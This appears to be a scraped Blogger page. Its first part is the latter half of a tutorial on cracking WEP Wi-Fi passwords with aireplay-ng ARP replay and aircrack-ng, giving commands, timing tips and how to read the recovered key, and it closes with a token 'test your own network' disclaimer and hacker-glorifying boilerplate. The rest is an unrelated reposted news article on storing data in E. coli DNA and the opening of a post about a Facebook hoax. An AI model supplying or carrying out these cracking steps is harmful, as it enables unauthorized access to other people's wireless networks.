</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">This will send some commands to the router that basically it is to associate your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)" </span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">If this happens, then good! You are almost there.</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
Now type:</span></div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><div><span style="font-size: x-small;">aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0</span></div></blockquote><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. </span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Now type:</span></div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><div><span style="font-size: x-small;">aircrack-ng -b (bssid) (filename)-01.cap</span></div></blockquote><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Remember the file name you made up earlier? Mine was "Ben". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap<br />
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000." </span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.<br />
<br />
If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:</span></div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">se:cr:et</span></blockquote><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:</span></div><blockquote style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">0F:KW:94:27:VF</span></blockquote><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8KoDeIFtNm87u_xuR1wzCQxmWi4URQi5h8lIUSCIe3Lx7Aio9mi30LtEelZkGO-ScnzOIv-zukJL4bWUgxbz-EfKEKYbpSr61Tz-XbuwcedRvKEuxDIiKp_-ZnP3OY99etIffGx1cRPg/s1600/wepcrack-success.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8KoDeIFtNm87u_xuR1wzCQxmWi4URQi5h8lIUSCIe3Lx7Aio9mi30LtEelZkGO-ScnzOIv-zukJL4bWUgxbz-EfKEKYbpSr61Tz-XbuwcedRvKEuxDIiKp_-ZnP3OY99etIffGx1cRPg/s320/wepcrack-success.png" width="320" /></a></div><br />
<br />
<div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;">Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!<br />
<br />
It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.<br />
<br />
I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network.</span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> </span></div><div style="font-family: Arial,Helvetica,sans-serif;"><b><span style="font-size: large;"><span>VDO to easily crack WEP...</span></span></b></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> </span></div><div class="separator" style="clear: both; text-align: center;"><object width="320" height="266" class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://1.gvt0.com/vi/kDD9PjiQ2_U/0.jpg"><param name="movie" value="http://www.youtube.com/v/kDD9PjiQ2_U&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><embed width="320" height="266" src="http://www.youtube.com/v/kDD9PjiQ2_U&fs=1&source=uds" type="application/x-shockwave-flash"></embed></object></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"> </span></div><div style="font-family: Georgia,"Times New Roman",serif;"><span style="font-size: x-small;"><br />
</span></div> <This GROUP is for Educational Purposes ONLY !><br />
<Spread the word, information is free><br />
<*Welcome 2 U ALL FRM MY SIDE*<br />
*HACKERS R KNOWN AS DANGEROUS:<br />
"THEIR only goal is the Knowledge, <br />
and because the Knowledge is the Power, <br />
THEY are considered as dangerous."-<a href="http://shenanigans-nepal.blogspot.com/">deadbj</a><br />
<br />
SRC : <a href="http://www.isoftdl.com/">http://www.isoftdl.com/</a><span style="font-size: x-small;"><a href="http://www.isoftdl.com/">http://www.isoftdl.com/</a></span></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com1tag:blogger.com,1999:blog-4622788998166863521.post-74510068781196234632011-01-10T09:20:00.000-08:002011-01-10T09:22:45.036-08:00BACTERIA WORK AS HARD DRIVES...<span class="Apple-style-span" style="font-family: Arial, Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 15px;"></span><br />
<h2 style="font-size: 1.2em; letter-spacing: 0px; line-height: 1.15em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Arial; font-size: 13px; line-height: normal; white-space: pre;"><u>BACTERIA WORK AS HARD DRIVES...</u></span></h2><h2 style="font-size: 1.2em; font-weight: normal; letter-spacing: 0px; line-height: 1.15em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><br />
</h2><h2 style="font-size: 1.2em; font-weight: normal; letter-spacing: 0px; line-height: 1.15em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">Scientists have found a way to store, encrypt and retrieve complex data in the DNA of E. coli.</h2><div><br />
</div><div><span class="Apple-style-span" style="color: #666666; font-size: 12px; line-height: 13px;">Mon Jan 10, 2011 01:00 AM ET <br style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" />Content provided by AFP/Judith Evans</span></div><div><span class="Apple-style-span" style="color: #666666; font-size: 12px; line-height: 13px;"><span class="Apple-style-span" style="line-height: 15px;"><b><span class="Apple-style-span" style="color: black; font-size: 13px; font-weight: normal;"></span></b></span></span><br />
<span class="Apple-style-span" style="color: #666666; font-size: 12px; line-height: 13px;"><span class="Apple-style-span" style="line-height: 15px;"><b><span class="Apple-style-span" style="color: black; font-size: 13px; font-weight: normal;"><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;">news was published on : <span class="Apple-style-span" style="color: #666666; font-size: 12px; line-height: 15px;"><b><span class="Apple-style-span" style="color: black; font-size: 13px; font-weight: normal;"><a href="http://news.discovery.com/tech/bacteria-work-as-hard-drives-110110.html">http://news.discovery.com/tech/bacteria-work-as-hard-drives-110110.html</a></span></b></span></span></div></span></b></span></span></div><div><span class="Apple-style-span" style="color: #666666; font-size: 12px; line-height: 13px;"><br />
</span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik2iH7CKOPDWZx4zQKs-RgnRiBKoujq9TyjZIIsSTkXwCrS-bX8esZGeEDyGz_s9NErp8wexmUyJ2dlTU4wyFy08COlobw2569auxGL89_XotnXWUP7eHLLQUnIZRlgJ4ngnfHiGvv6fQ/s1600/e-coli-278x225.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik2iH7CKOPDWZx4zQKs-RgnRiBKoujq9TyjZIIsSTkXwCrS-bX8esZGeEDyGz_s9NErp8wexmUyJ2dlTU4wyFy08COlobw2569auxGL89_XotnXWUP7eHLLQUnIZRlgJ4ngnfHiGvv6fQ/s1600/e-coli-278x225.jpg" /></a></div><div><span class="Apple-style-span" style="color: #666666; font-size: 12px; line-height: 13px;"><span class="Apple-style-span" style="color: black; font-size: 13px; line-height: 15px;"><span class="header" style="color: #81a45a; font-weight: bold; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">THE GIST</span></span></span><br />
<span class="Apple-style-span" style="color: #666666; font-size: 12px; line-height: 13px;"><span class="Apple-style-span" style="color: black; font-size: 13px; line-height: 15px;"><ul style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><li style="background-image: url(http://news.discovery.com/images/bullet.gif); background-position: 0px 14px; background-repeat: no-repeat no-repeat; color: #666666; font-size: 0.9em; font-weight: bold; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 8px; padding-right: 0px; padding-top: 8px;">A group of students at Hong Kong's Chinese University have developed a way to store complex information in bacteria.</li>
<li style="background-image: url(http://news.discovery.com/images/bullet.gif); background-position: 0px 14px; background-repeat: no-repeat no-repeat; color: #666666; font-size: 0.9em; font-weight: bold; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 8px; padding-right: 0px; padding-top: 8px;">This opens up a way to saving text, images, music, and even video within living cells.</li>
<li style="background-image: url(http://news.discovery.com/images/bullet.gif); background-position: 0px 14px; background-repeat: no-repeat no-repeat; color: #666666; font-size: 0.9em; font-weight: bold; list-style-image: initial; list-style-position: initial; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 8px; padding-right: 0px; padding-top: 8px;">One gram of bacteria could store the same amount of information as 450 2,000-gigabyte hard disks.</li>
</ul><div><span class="Apple-style-span" style="color: #666666; font-size: small;"><span class="Apple-style-span" style="font-size: 12px;"><b><br />
</b></span></span></div><div><span class="Apple-style-span" style="color: #666666; font-size: small;"><span class="Apple-style-span" style="font-size: 12px;"><b><span class="Apple-style-span" style="color: black; font-size: 13px; font-weight: normal;"></span></b></span></span><br />
<span class="Apple-style-span" style="color: #666666; font-size: small;"><span class="Apple-style-span" style="font-size: 12px;"><b><span class="Apple-style-span" style="color: black; font-size: 13px; font-weight: normal;"><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px;">A group of students at Hong Kong's Chinese University are making strides towards storing such vast amounts of information in an unexpected home: the <em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">E. coli</em> bacterium better known as a potential source of serious food poisoning.</div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px;"><br />
</div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">"This means you will be able to keep large datasets for the long term in a box of bacteria in the refrigerator," said Aldrin Yim, a student instructor on the university's biostorage project, a 2010 gold medallist in the Massachusetts Institute of Technology prestigious </span></span><a href="http://news.discovery.com/tech/%E2%80%9Chttp://news.discovery.com/tech/igem-competition-biotech-bacteria.html%E2%80%9D" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-top-style: none; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">iGEM</span></span></a><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">competition.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">Biostorage -- the art of storing and encrypting information in living organisms -- is a young field, having existed for about a decade.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">In 2007, a team at Japan's Keio University said they had successfully encoded the equation that represents Einstein's theory of relativity, E=MC², in the DNA of a common soil bacterium.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">They pointed out that because bacteria constantly reproduce, a group of the single-celled organisms could store a piece of information for thousands of years.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">But the Hong Kong researchers have leaped beyond this early step, developing methods to store more complex data and starting to overcome practical problems which have lent weight to skeptics who see the method as science fiction.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">The group has developed a method of compressing data, splitting it into chunks and distributing it between different bacterial cells, which helps to overcome limits on storage capacity. They are also able to "map" the DNA so information can be easily located.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><strong style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><a href="http://planetgreen.discovery.com/slideshows/work-connect/artist-tackles-worlds-deadliest-diseases.html" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-top-style: none; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">PlanetGreen: Artist Tackles World's Deadliest Diseases</span></span></a></strong><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;"><a href="http://planetgreen.discovery.com/slideshows/work-connect/artist-tackles-worlds-deadliest-diseases.html" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-top-style: none; border-top-width: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"></a></span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">This opens up the way to storing not only text, but images, music, and even video within cells.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">As a storage method it is extremely compact -- because each cell is minuscule, the group says that one gram of bacteria could store the same amount of information as 450 2,000-gigabyte hard disks.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">They have also developed a three-tier security fence to encode the data, which may come as welcome news to U.S. diplomats, who have seen their thoughts splashed over the Internet thanks to WikiLeaks.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">"Bacteria can't be hacked," points out Allen Yu, another student instructor.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">"All kinds of computers are vulnerable to electrical failures or data theft. But bacteria are immune from cyber attacks. You can safeguard the information."</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">The team have even coined a word for this field -- biocryptography -- and the encoding mechanism contains built-in checks to ensure that mutations in some bacterial cells do not corrupt the data as a whole.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">Professor Chan Ting Fung, who supervised the student team, told AFP that practical work in the field -- fostered by MIT, who have helped develop standards enabling researchers to collaborate -- was in its early stages.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">But he said: "What the students did was to try it out and make sure some of the fundamental principles are actually achievable."</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">The Hong Kong group's work may have a more immediate application.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">The techniques they use -- removing DNA from bacterial cells, manipulating them using enzymes and returning them to a new cell -- are similar to those used to create genetically modified foods.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">But rather than changing the building blocks of an organism, the Hong Kong group allows extra information to piggyback on the DNA of the cell, after checking their changes against a master database to make sure they do not have accidental toxic effects.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">Their work could enable extra information to be added to a genetically modified crop in the form of a "bio barcode", Chan said.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">"For example, a company that makes a GM tomato that grows extra large with a gene that promotes growth -- on top of that we can actually encode additional information like safety protocols, things that are not directly related to the biological system."</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">Other types of information, like copyright and design history, could help to monitor the spread of GM crops, he said.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">"It's kind of a safety net for synthetic organisms," said Wong Kit Ying, from the student team.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">Beyond this, Chan and the students are evangelical about the future possibilities of synthetic biology.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">"The field is getting popular because of the energy crisis, environmental pollution, climate change. They are thinking that a biological system will be a future solution to those -- as alternative energy sources, as a remedy for pollution. For these, micro-organisms are the obvious choice," Chan said.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">One type of bacterium, </span></span><em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">Deinococcus radiodurans</span></span></em><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">, can even survive nuclear radiation.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">"Bacteria are everywhere: they can survive on things that are unthinkable to humans. So we can make use of this," Chan said.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">So is it possible that a home computer could one day consist of a dish filled with micro-organisms?</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">The group dismisses concerns that this could be dangerous, pointing out that despite </span></span><em style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">E. coli</span></span></em><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">'s poor reputation, they use an altered form that cannot exist outside a rich synthetic medium.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">In fact, says Chan, while safety rules are strict, more measures are taken to protect the bacteria from contamination than to protect the researchers from the bacteria.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">However, Yim admitted that while the group's work is a "foundational advance", a Petri dish PC is not likely to be on the market in the coming years, not least because the method of retrieving the data requires experts in a laboratory.</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: yellow;">"It's possible," he said, "but there's a long way to go."</span></span></div><div style="line-height: 1.3em; margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 165px; padding-right: 0px; padding-top: 0px; text-align: left;"><span class="Apple-style-span" style="font-size: small;">news was published on : <span class="Apple-style-span" style="color: #666666; font-size: 12px; line-height: 15px;"><b><span class="Apple-style-span" style="color: black; font-size: 13px; font-weight: normal;"><a href="http://news.discovery.com/tech/bacteria-work-as-hard-drives-110110.html">http://news.discovery.com/tech/bacteria-work-as-hard-drives-110110.html</a></span></b></span></span></div></span></b></span></span></div></span></span></div>deadbjhttp://www.blogger.com/profile/07668877947934556480noreply@blogger.com0tag:blogger.com,1999:blog-4622788998166863521.post-9550524825051800282011-01-09T11:50:00.000-08:002011-01-09T11:50:54.461-08:00News on Facebook Ending was a HoaX.-maRk<span class="Apple-style-span" style="color: #333333; font-family: arial, helvetica, sans-serif; font-size: 16px; line-height: 16px;"></span><br />
<h1 class="entry-title" style="background-attachment: initial; background-clip: initial; background-color: transparent; background-image: initial; background-origin: initial; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; clear: both; color: black; font-family: Arial, Verdana, Helvetica; font-weight: bold; line-height: 1.1em; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"><span class="Apple-style-span" style="font-size: small;"><u>Facebook will NOT end on March 15th. Hoax news story spreads like wildfire</u></span></h1><div><span class="Apple-style-span" style="font-size: small;"><u><br />
